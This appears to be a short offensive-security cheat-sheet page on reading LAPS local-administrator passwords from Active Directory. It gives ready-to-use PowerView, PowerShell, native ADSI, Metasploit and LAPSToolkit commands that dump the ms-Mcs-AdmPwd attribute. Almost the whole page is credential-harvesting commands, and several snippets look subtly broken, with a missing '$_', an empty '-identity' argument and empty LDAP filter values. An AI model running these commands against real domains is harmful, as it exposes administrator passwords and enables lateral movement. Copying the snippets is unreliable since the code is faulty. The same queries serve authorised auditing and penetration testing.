# Laps Password Read

![Permission ==> Read Laps Password](https://3517022440-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7AiL05qubQhf0RoEOXWw%2Fuploads%2FY2cw3GaKydDTquzytQRS%2Fimage.png?alt=media\&token=b1cb8c21-c7eb-49d1-9413-794ba39c2063)

## Powerview

`Get-NetComputer | Select-Object 'name','ms-mcs-admpwd' Get-DomainComputer -identity -properties ms-Mcs-AdmPwd`

## PowerShell

`Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'`

## Native

`([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=)(sAMAccountName=))").findAll() | ForEach-Object { Write-Host "" ; $.properties.cn ; $.properties.'ms-mcs-admpwd'}`<br>

## Metasploit

`use post/windows/gather/credentials/enum_laps`

## LAPSToolkit

```
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

Get-LAPSComputers -Credential $cred
```